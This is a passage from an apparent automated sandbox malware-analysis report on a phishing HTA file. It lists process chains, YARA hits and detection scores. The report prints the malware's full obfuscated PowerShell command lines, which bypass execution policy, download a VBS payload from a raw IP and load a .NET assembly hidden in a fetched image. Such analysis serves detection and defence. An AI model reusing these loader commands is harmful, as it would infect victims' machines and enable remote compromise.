2FkbycrJ0RmdyxEZndkZXNhdGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3ZGVzYXRpdmFkb0RmdyxEZndkZXNhJysndGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3MURmdyxEZndkJysnZXNhdGl2YWRvRGZ3KSk7JykgIC1jUkVwTEFDRShbQ2hhcl02OCtbQ2hhcl0xMDIrW0NoYXJdMTE5KSxbQ2hhcl0zOS1jUkVwTEFDRSAgJ045WScsW0NoYXJdMTI0LVJlUExBQ0UgIChbQ2hhcl0xMDQrW0NoYXJdNzErW0NoYXJdOTcpLFtDaGFyXTM2KXwgLiggJGVOdjpjb21zUEVjWzQsMjQsMjVdLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('+'DfwVAIDfw);hGavaiMethod.Invoke(hGanull, @(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, DfwdesativadoDfw, DfwdesativadoDfw, DfwdesativadoDfw, Dfwaspnet_compilerDfw, DfwdesativadoDfw, Dfwdesativ'+'ado'+'Dfw,DfwdesativadoDfw,DfwdesativadoDfw,DfwdesativadoDfw,Dfwdesa'+'tivadoDfw,DfwdesativadoDfw,Dfw1Dfw,Dfwd'+'esativadoDfw));') -cREpLACE([Char]68+[Char]102+[Char]119),[Char]39-cREpLACE 'N9Y',[Char]124-RePLACE ([Char]104+[Char]71+[Char]97),[Char]36)| .( $eNv:comsPEc[4,24,25]-JoIn'')"Jump to behavior
          Malicious sample detected (through community Yara rule)
          Source: Process Memory Space: powershell.exe PID: 7064, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: Process Memory Space: powershell.exe PID: 2492, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Windows Scripting host queries suspicious COM object (likely to drop second stage)
          Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
          Wscript starts Powershell (via cmd or directly)
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnaEdhaW1hZ2VVcmwgPSBEZndodHRwczovLzMxMDUuZmlsZScrJ21haWwuY29tL2FwaS8nKydmaWxlL2dldD9maScrJ2xla2V5PXNoVFAnKydIYkNQWDhvLWxPJysndENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBEZnc7aEdhd2ViQ2xpZW50ICcrJz0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtoR2EnKydpbWFnZUJ5dGVzID0gaEdhd2ViQ2xpZW50LkQnKydvd25sb2FkJysnRGF0YShoR2FpbWFnZVVybCk7aEdhaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaEdhaW1hZ2VCeXRlcyk7aEdhc3RhcnRGbGFnID0gRGZ3PDxCQVNFNjRfU1RBUlQ+PkRmdztoR2FlbmRGbGFnID0gRGYnKyd3PDxCQVNFNjRfRU5EPj5EZnc7aEdhc3RhcnRJbmRleCA9IGhHYWltYWdlVGV4dCcrJy5JbmRleE9mKGhHYXN0YXJ0RmxhZyk7aEdhZW5kSW5kZXggPSBoR2FpbWFnZVRleHQuSW5kZXhPZicrJyhoR2FlbmRGbGFnKTtoR2FzdGFydEluZGV4IC1nZSAwIC1hbmQgaEdhZW5kSW5kZXggLWd0IGhHYXMnKyd0YXJ0SW5kZXg7aEdhc3RhcnRJbmRleCArPSBoR2FzdGFydEYnKydsYWcuTGVuZ3RoO2hHYWJhc2U2NExlbmd0aCA9IGhHYWVuZEluZGV4IC0gaEdhc3RhcicrJ3RJbmRleDtoR2FiYXNlNjRDb21tYW5kID0gaEdhaW1hZ2VUZXh0LlN1YnN0cmluZyhoR2FzdGEnKydydEluZGV4LCBoR2FiYXNlNjRMZW5ndGgpO2hHYWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGhHYWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBOOVkgRm9yRWFjaC1PYmplY3QgeyBoR2FfIH0pWy0xLi4tKGhHYWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aEdhY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhoR2FiJysnYScrJ3NlNjRSZXZlcnNlZCk7aEdhbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGhHYWNvbW1hbmRCeXRlcyk7aEdhdmFpTScrJ2V0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZCgnKydEZndWQUlEZncpO2hHYXZhaU1ldGhvZC5JbnZva2UoaEdhbnVsbCwgQChEZnd0eHQuUlRDQ0NSVi82MjIvNTEyLjgyMS41OS4zMi8vOnB0dGhEZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2FzcG5ldF9jb21waWxlckRmdywgRGZ3ZGVzYXRpdmFkb0RmdywgRGZ3ZGVzYXRpdicrJ2FkbycrJ0RmdyxEZndkZXNhdGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3ZGVzYXRpdmFkb0RmdyxEZndkZXNhJysndGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3MURmdyxEZndkJysnZXNhdGl2YWRvRGZ3KSk7JykgIC1jUkVwTEFDRShbQ2hhcl02OCtbQ2hhcl0xMDIrW0NoYXJdMTE5KSxbQ2hhcl0zOS1jUkVwTEFDRSAgJ045WScsW0NoYXJdMTI0LVJlUExBQ0UgIChbQ2hhcl0xMDQrW0NoYXJdNzErW0NoYXJdOTcpLFtDaGFyXTM2KXwgLiggJGVOdjpjb21zUEVjWzQsMjQsMjVdLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnaEdhaW1hZ2VVcmwgPSBEZndodHRwczovLzMxMDUuZmlsZScrJ21haWwuY29tL2FwaS8nKydmaWxlL2dldD9maScrJ2xla2V5PXNoVFAnKydIYkNQWDhvLWxPJysndENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBEZnc7aEdhd2ViQ2xpZW50ICcrJz0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtoR2EnKydpbWFnZUJ5dGVzID0gaEdhd2ViQ2xpZW50LkQnKydvd25sb2FkJysnRGF0YShoR2FpbWFnZVVybCk7aEdhaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaEdhaW1hZ2VCeXRlcyk7aEdhc3RhcnRGbGFnID0gRGZ3PDxCQVNFNjRfU1RBUlQ+PkRmdztoR2FlbmRGbGFnID0gRGYnKyd3PDxCQVNFNjRfRU5EPj5EZnc7aEdhc3RhcnRJbmRleCA9IGhHYWltYWdlVGV4dCcrJy5JbmRleE9mKGhHYXN0YXJ0RmxhZyk7aEdhZW5kSW5kZXggPSBoR2FpbWFnZVRleHQuSW5kZXhPZicrJyhoR2FlbmRGbGFnKTtoR2FzdGFydEluZGV4IC1nZSAwIC1hbmQgaEdhZW5kSW5kZXggLWd0IGhHYXMnKyd0YXJ0SW5kZXg7aEdhc3RhcnRJbmRleCArPSBoR2FzdGFydEYnKydsYWcuTGVuZ3RoO2hHYWJhc2U2NExlbmd0aCA9IGhHYWVuZEluZGV4IC0gaEdhc3RhcicrJ3RJbmRleDtoR2FiYXNlNjRDb21tYW5kID0gaEdhaW1hZ2VUZXh0LlN1YnN0cmluZyhoR2FzdGEnKydydEluZGV4LCBoR2FiYXNlNjRMZW5ndGgpO2hHYWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGhHYWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBOOVkgRm9yRWFjaC1PYmplY3QgeyBoR2FfIH0pWy0xLi4tKGhHYWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aEdhY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhoR2FiJysnYScrJ3NlNjRSZXZlcnNlZCk7aEdhbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGhHYWNvbW1hbmRCeXRlcyk7aEdhdmFpTScrJ2V0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZCgnKydEZndWQUlEZncpO2hHYXZhaU1ldGhvZC5JbnZva2UoaEdhbnVsbCwgQChEZnd0eHQuUlRDQ0NSVi82MjIvNTEyLjgyMS41OS4zMi8vOnB0dGhEZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2FzcG5ldF9jb21waWxlckRmdywgRGZ3ZGVzYXRpdmFkb0RmdywgRGZ3ZGVzYXRpdicrJ2FkbycrJ0RmdyxEZndkZXNhdGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3ZGVzYXRpdmFkb0RmdyxEZndkZXNhJysndGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3MURmdyxEZndkJysnZXNhdGl2YWRvRGZ3KSk7JykgIC1jUkVwTEFDRShbQ2hhcl02OCtbQ2hhcl0xMDIrW0NoYXJdMTE5KSxbQ2hhcl0zOS1jUkVwTEFDRSAgJ045WScsW0NoYXJdMTI0LVJlUExBQ0UgIChbQ2hhcl0xMDQrW0NoYXJdNzErW0NoYXJdOTcpLFtDaGFyXTM2KXwgLiggJGVOdjpjb21zUEVjWzQsMjQsMjVdLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2005
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2402
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2005Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2402Jump to behavior
          Source: Process Memory Space: powershell.exe PID: 7064, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: Process Memory Space: powershell.exe PID: 2492, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: classification engineClassification label: mal100.phis.expl.evad.winHTA@17/19@1/2
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\seethepossiblethingsforentiretimetogivemebest[1].tiffJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7128:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_03
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w5e4h1pl.1ss.ps1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethepossiblethingsforentiretimetogivemebest.vBs"
          Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.htaReversingLabs: Detection: 21%
          Source: greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.htaVirustotal: Detection: 29%
          Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.hta"
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'JEJ5byAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CRVJEZUZpTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeU56eG4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRZdVksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRalVXbHdkYUNaVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0EpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImNUbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5cWFMV2ZtcCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRCeW86OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4xMjguMjE1LzIyNi9zZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudElGIiwiJEVOdjpBUFBEQVRBXHNlZXRoZXBvc3NpYmxldGhpbmdzZm9yZW50aXJldGltZXRvZ2l2ZW1lYmVzdC52QnMiLDAsMCk7c3RBclQtc0xlZXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudkJzIg=='+[cHar]34+'))')))"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.cmdline"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2022.tmp" "c:\Users\user\AppData\Local\Temp\w0uathue\CSC6F7F1D769E649D6AA11CFF4BFABFB3.TMP"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethepossiblethingsforentiretimetogivemebest.vBs"
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnaEdhaW1hZ2VVcmwgPSBEZndodHRwczovLzMxMDUuZmlsZScrJ21haWwuY29tL2FwaS8nKydmaWxlL2dldD9maScrJ2xla2V5PXNoVFAnKydIYkNQWDhvLWxPJysndENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBEZnc7aEdhd2ViQ2xpZW50ICcrJz0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtoR2EnKydpbWFnZUJ5dGVzID0gaEdhd2ViQ2xpZW50LkQnKydvd25sb2FkJysnRGF0YShoR2FpbWFnZVVybCk7aEdhaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaEdhaW1hZ2VCeXRlcyk7aEdhc3RhcnRGbGFnID0gRGZ3PDxCQVNFNjRfU1RBUlQ+PkRmdztoR2FlbmRGbGFnID0gRGYnKyd3PDxCQVNFNjRfRU5EPj5EZnc7aEdhc3RhcnRJbmRleCA9IGhHYWltYWdlVGV4dCcrJy5JbmRleE9mKGhHYXN0YXJ0RmxhZyk7aEdhZW5kSW5kZXggPSBoR2FpbWFnZVRleHQuSW5kZXhPZicrJyhoR2FlbmRGbGFnKTtoR2FzdGFydEluZGV4IC1nZSAwIC1hbmQgaEdhZW5kSW5kZXggLWd0IGhHYXMnKyd0YXJ0SW5kZXg7aEdhc3RhcnRJbmRleCArPSBoR2FzdGFydEYnKydsYWcuTGVuZ3RoO2hHYWJhc2U2NExlbmd0aCA9IGhHYWVuZEluZGV4IC0gaEdhc3RhcicrJ3RJbmRleDtoR2FiYXNlNjRDb21tYW5kID0gaEdhaW1hZ2VUZXh0LlN1YnN0cmluZyhoR2FzdGEnKydydEluZGV4LCBoR2FiYXNlNjRMZW5ndGgpO2hHYWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGhHYWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBOOVkgRm9yRWFjaC1PYmplY3QgeyBoR2FfIH0pWy0xLi4tKGhHYWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aEdhY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhoR2FiJysnYScrJ3NlNjRSZXZlcnNlZCk7aEdhbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGhHYWNvbW1hbmRCeXRlcyk7aEdhdmFpTScrJ2V0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZCgnKydEZndWQUlEZncpO2hHYXZhaU1ldGhvZC5JbnZva2UoaEdhbnVsbCwgQChEZnd0eHQuUlRDQ0NSVi82MjIvNTEyLjgyMS41OS4zMi8vOnB0dGhEZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2FzcG5ldF9jb21waWxlckRmdywgRGZ3ZGVzYXRpdmFkb0RmdywgRGZ3ZGVzYXRpdicrJ2FkbycrJ0RmdyxEZndkZXNhdGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3ZGVzYXRpdmFkb0RmdyxEZndkZXNhJysndGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3MURmdyxEZndkJysnZXNhdGl2YWRvRGZ3KSk7JykgIC1jUkVwTEFDRShbQ2hhcl02OCtbQ2hhcl0xMDIrW0NoYXJdMTE5KSxbQ2hhcl0zOS1jUkVwTEFDRSAgJ045WScsW0NoYXJdMTI0LVJlUExBQ0UgIChbQ2hhcl0xMDQrW0NoYXJdNzErW0NoYXJdOTcpLFtDaGFyXTM2KXwgLiggJGVOdjpjb21zUEVjWzQsMjQsMjVdLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('+'DfwVAIDfw);hGavaiMethod.Invoke(hGanull, @(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, DfwdesativadoDfw, DfwdesativadoDfw, DfwdesativadoDfw, Dfwaspnet_compilerDfw, DfwdesativadoDfw, Dfwdesativ'+'ado'+'Dfw,DfwdesativadoDfw,DfwdesativadoDfw,DfwdesativadoDfw,Dfwdesa'+'tivadoDfw,DfwdesativadoDfw,Dfw1Dfw,Dfwd'+'esativadoDfw));') -cREpLACE([Char]68+[Char]102+[Char]119),[Char]39-cREpLACE 'N9Y',[Char]124-RePLACE ([Char]104+[Char]71+[Char]97),[Char]36)| .( $eNv:comsPEc[4,24,25]-JoIn'')"
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'JEJ5byAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CRVJEZUZpTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeU56eG4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRZdVksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRalVXbHdkYUNaVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0EpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImNUbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5cWFMV2ZtcCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRCeW86OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4xMjguMjE1LzIyNi9zZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudElGIiwiJEVOdjpBUFBEQVRBXHNlZXRoZXB